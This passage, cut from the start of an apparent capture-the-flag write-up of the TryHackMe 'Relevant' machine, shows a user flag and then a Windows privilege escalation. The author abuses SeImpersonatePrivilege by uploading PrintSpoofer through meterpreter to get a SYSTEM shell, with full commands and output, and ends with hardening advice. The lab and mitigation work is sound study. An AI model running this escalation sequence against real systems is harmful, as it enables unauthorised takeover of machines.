class="n">type</span> <span class="n">user.txt</span> </span></span><span class="line"><span class="cl"><span class="n">type</span> <span class="n">user.txt</span> </span></span><span class="line"><span class="cl"><span class="n">THM</span><span class="p">{</span><span class="n">fdk4ka34vk346ksxfr21tg789ktf45</span><span class="p">}</span> </span></span></code></pre></div><h2 id="privilege-escalation">Privilege Escalation </h2><p>First of all, always check for privileges the current user has.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="n">c</span><span class="p">:</span><span class="err">\</span><span class="n">Users</span><span class="err">\</span><span class="n">Bob</span><span class="err">\</span><span class="n">Desktop</span><span class="o">&gt;</span><span class="n">whoami</span> <span class="o">/</span><span class="n">priv</span> </span></span><span class="line"><span class="cl"><span class="n">whoami</span> <span class="o">/</span><span class="n">priv</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">PRIVILEGES</span> <span class="n">INFORMATION</span> </span></span><span class="line"><span class="cl"><span class="c1">----------------------</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">Privilege</span> <span class="n">Name</span> <span class="n">Description</span> <span class="n">State</span> </span></span><span class="line"><span class="cl"><span class="o">=============================</span> <span class="o">=========================================</span> <span class="o">========</span> </span></span><span class="line"><span class="cl"><span class="n">SeAssignPrimaryTokenPrivilege</span> <span class="n">Replace</span> <span class="n">a</span> <span class="n">process</span> <span class="n">level</span> <span class="n">token</span> <span class="n">Disabled</span> </span></span><span class="line"><span class="cl"><span class="n">SeIncreaseQuotaPrivilege</span> <span class="n">Adjust</span> <span class="n">memory</span> <span class="n">quotas</span> <span class="kr">for</span> <span class="n">a</span> <span class="n">process</span> <span class="n">Disabled</span> </span></span><span class="line"><span class="cl"><span class="n">SeAuditPrivilege</span> <span class="n">Generate</span> <span class="n">security</span> <span class="n">audits</span> <span class="n">Disabled</span> </span></span><span class="line"><span class="cl"><span class="n">SeChangeNotifyPrivilege</span> <span class="n">Bypass</span> <span class="n">traverse</span> <span class="n">checking</span> <span class="n">Enabled</span> </span></span><span class="line"><span class="cl"><span class="n">SeImpersonatePrivilege</span> <span class="n">Impersonate</span> <span class="n">a</span> <span class="n">client</span> <span class="n">after</span> <span class="n">authentication</span> <span class="n">Enabled</span> </span></span><span class="line"><span class="cl"><span class="n">SeCreateGlobalPrivilege</span> <span class="n">Create</span> <span class="n">global</span> <span class="n">objects</span> <span class="n">Enabled</span> </span></span><span class="line"><span class="cl"><span class="n">SeIncreaseWorkingSetPrivilege</span> <span class="n">Increase</span> <span class="n">a</span> <span class="n">process</span> <span class="n">working</span> <span class="n">set</span> <span class="n">Disabled</span> </span></span></code></pre></div><p>We see that the user has <code>SeImpersonatePrivilege</code>. This means, a specific privilege in Windows OS that allows a process to impersonate a user or another process. So I can abuse this by a custom process to impersonate as the <code>NT\Authority</code> user. So to exploit this, quick google search gives us this <a class="link" href="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer" target="_blank" rel="noopener" >link</a> from Hacktricks(A great resource).</p> <p>A/c to usage, the command given to the PrintSpoofer.exe in <code>-c</code> flag will be executed as <code>NT\Authority</code> user.</p> <p>Here is the file <a class="link" href="https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" target="_blank" rel="noopener" ><code>PrintSpooferx64.exe</code></a>. I will upload it using the upload command in meterpreter session, then execute it with <code>-c</code> flag to give a powershell session of privileged user.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="n">meterpreter</span> <span class="o">&gt;</span> <span class="n">cd</span> <span class="s1">&#39;c:</span><span class="err">\</span><span class="s1">inetpub</span><span class="err">\</span><span class="s1">wwwroot</span><span class="se">\n</span><span class="s1">t4wrksv&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">meterpreter</span> <span class="o">&gt;</span> <span class="n">upload</span> <span class="n">PrintSpoofer64.exe</span> </span></span><span class="line"><span class="cl"><span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="n">Uploading</span> <span class="p">:</span> <span class="o">/</span><span class="n">Users</span><span class="o">/</span><span class="n">vikas</span><span class="o">/</span><span class="n">Pentesting</span><span class="o">/</span><span class="n">Tryhackme</span><span class="o">/</span><span class="n">relevant</span><span class="o">/</span><span class="n">PrintSpoofer64.exe</span> <span class="o">-&gt;</span> <span class="n">PrintSpoofer64.exe</span> </span></span><span class="line"><span class="cl"><span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="n">Uploaded</span> <span class="mf">26.50</span> <span class="n">KiB</span> <span class="n">of</span> <span class="mf">26.50</span> <span class="n">KiB</span> <span class="p">(</span><span class="mf">100.0</span><span class="o">%</span><span class="p">):</span> <span class="o">/</span><span class="n">Users</span><span class="o">/</span><span class="n">vikas</span><span class="o">/</span><span class="n">Pentesting</span><span class="o">/</span><span class="n">Tryhackme</span><span class="o">/</span><span class="n">relevant</span><span class="o">/</span><span class="n">PrintSpoofer64.exe</span> <span class="o">-&gt;</span> <span class="n">PrintSpoofer64.exe</span> </span></span><span class="line"><span class="cl"><span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="n">Completed</span> <span class="p">:</span> <span class="o">/</span><span class="n">Users</span><span class="o">/</span><span class="n">vikas</span><span class="o">/</span><span class="n">Pentesting</span><span class="o">/</span><span class="n">Tryhackme</span><span class="o">/</span><span class="n">relevant</span><span class="o">/</span><span class="n">PrintSpoofer64.exe</span> <span class="o">-&gt;</span> <span class="n">PrintSpoofer64.exe</span> </span></span><span class="line"><span class="cl"><span class="n">meterpreter</span> <span class="o">&gt;</span> <span class="n">shell</span> </span></span><span class="line"><span class="cl"><span class="n">Process</span> <span class="mi">3240</span> <span class="n">created</span><span class="p">.</span> </span></span><span class="line"><span class="cl"><span class="n">Channel</span> <span class="mi">3</span> <span class="n">created</span><span class="p">.</span> </span></span><span class="line"><span class="cl"><span class="n">Microsoft</span> <span class="n">Windows</span> <span class="p">[</span><span class="n">Version</span> <span class="mf">10.0.14393</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="p">(</span><span class="n">c</span><span class="p">)</span> <span class="mi">2016</span> <span class="n">Microsoft</span> <span class="n">Corporation</span><span class="p">.</span> <span class="n">All</span> <span class="n">rights</span> <span class="n">reserved</span><span class="p">.</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">c</span><span class="p">:</span><span class="err">\</span><span class="n">inetpub</span><span class="err">\</span><span class="n">wwwroot</span><span class="err">\</span><span class="n">nt4wrksv</span><span class="o">&gt;</span><span class="p">.</span><span class="err">\</span><span class="n">PrintSpoofer64.exe</span> <span class="o">-</span><span class="n">i</span> <span class="o">-</span><span class="n">c</span> <span class="n">powershell.exe</span> </span></span><span class="line"><span class="cl"><span class="p">.</span><span class="err">\</span><span class="n">PrintSpoofer64.exe</span> <span class="o">-</span><span class="n">i</span> <span class="o">-</span><span class="n">c</span> <span class="n">powershell.exe</span> </span></span><span class="line"><span class="cl"><span class="p">[</span><span class="o">+</span><span class="p">]</span> <span class="n">Found</span> <span class="n">privilege</span><span class="p">:</span> <span class="n">SeImpersonatePrivilege</span> </span></span><span class="line"><span class="cl"><span class="p">[</span><span class="o">+</span><span class="p">]</span> <span class="n">Named</span> <span class="n">pipe</span> <span class="n">listening</span><span class="p">...</span> </span></span><span class="line"><span class="cl"><span class="p">[</span><span class="o">+</span><span class="p">]</span> <span class="n">CreateProcessAsUser</span><span class="p">()</span> <span class="n">OK</span> </span></span><span class="line"><span class="cl"><span class="n">Windows</span> <span class="n">PowerShell</span> </span></span><span class="line"><span class="cl"><span class="n">Copyright</span> <span class="p">(</span><span class="n">C</span><span class="p">)</span> <span class="mi">2016</span> <span class="n">Microsoft</span> <span class="n">Corporation</span><span class="p">.</span> <span class="n">All</span> <span class="n">rights</span> <span class="n">reserved</span><span class="p">.</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">PS</span> <span class="n">C</span><span class="p">:</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">system32</span><span class="o">&gt;</span> <span class="n">whoami</span> </span></span><span class="line"><span class="cl"><span class="n">whoami</span> </span></span><span class="line"><span class="cl"><span class="n">nt</span> <span class="n">authority</span><span class="err">\</span><span class="n">system</span> </span></span></code></pre></div><p>So as you can see, I have now taken over the machine 🎉</p> <h2 id="mitigation-techniques">Mitigation Techniques </h2><ol> <li> <p><strong>Disable Unnecessary Services(like port 49663)</strong>:</p> <ul> <li>Regularly review and disable any services that are not required. This reduces the attack surface and potential entry points for attackers.</li> </ul> </li> <li> <p><strong>Least Privilege Principle</strong>:</p> <ul> <li>Apply the principle of least privilege to all user accounts and services. Users and services should only have the minimum level of access necessary to perform their tasks.</li> </ul> </li> <li> <p><strong>Strong Authentication Mechanisms(in this case for smb)</strong>:</p> <ul> <li>Use strong, complex passwords and consider implementing multi-factor authentication (MFA) to add an extra layer of security to user accounts.</li> </ul> </li> </ol> <h2 id="specific-mitigations">Specific Mitigations </h2><ol> <li> <p><strong>Restrict SMB Access</strong>:</p> <ul> <li>Disable anonymous access to SMB shares. Configure SMB shares to require authentication and only allow access to authorized users.</li> <li>Apply strict permissions to SMB shares, ensuring that only necessary users have write access.</li> </ul> </li> <li> <p><strong>Secure HTTP Access</strong>:</p> <ul> <li>Ensure that HTTP services are properly secured. If file uploads are required, implement strict controls to validate and sanitize uploaded files to prevent the upload of malicious files such as reverse shells.</li> <li>Use secure coding practices to prevent vulnerabilities such as arbitrary file upload and remote code execution.</li> </ul> </li> <li> <p><strong>Restrict Privileges</strong>:</p> <ul> <li>Regularly review and restrict the assignment of high-privilege accounts such as those with <code>SeImpersonatePrivilege</code>. Only assign such privileges to accounts that absolutely require them.</li> <li>Use Group Policy to enforce restrictions on privilege assignments and regularly audit these policies.</li> </ul> </li> <li> <p><strong>Implement Endpoint Protection</strong>:</p> <ul> <li>Deploy endpoint protection solutions that can detect and block common attack techniques, such as reverse shells and privilege escalation tools like PrintSpoofer.</li> <li>Regularly update endpoint protection signatures and configurations to ensure they can detect the latest threats.</li> </ul> </li> <li> <p><strong>Harden Print Spooler Service</strong>:</p> <ul> <li>Regularly audit and review the security of the Print Spooler service. Disable the Print Spooler service on systems where it is not required.</li> <li>Apply patches and updates related to the Print Spooler service to address known vulnerabilities.</li> </ul> </li> <li> <p><strong>Application Whitelisting</strong>:</p> <ul> <li>Implement application whitelisting to control which executables are allowed to run on the system. This can prevent unauthorized tools and scripts from executing.</li> </ul> </li> <li> <p><strong>Isolate and Monitor High-Privilege Accounts</strong>:</p> <ul> <li>Isolate high-privilege accounts and monitor their usage closely. Implement additional security controls such as MFA and session logging for these accounts.</li> </ul> </li> </ol> <h2 id="conclusion">Conclusion </h2><p>Overall, this was an easy box actually which required a lot of patience 😅. Exploitation after finding that exposed folder on port 49663 is easy. Rest all scripts and tools are available online to use.</p> <!-- - **Summary:** Brief summary of the entire process. - **Lessons Learned:** Key lessons learned from the exploitation process. - **Additional Notes:** Any additional notes or thoughts on the machine. --> <h2 id="references">References </h2><ul> <li><a class="link" href="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer" target="_blank" rel="noopener" >https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer</a></li> <li><a class="link" href="https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" target="_blank" rel="noopener" >https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe</a></li> </ul>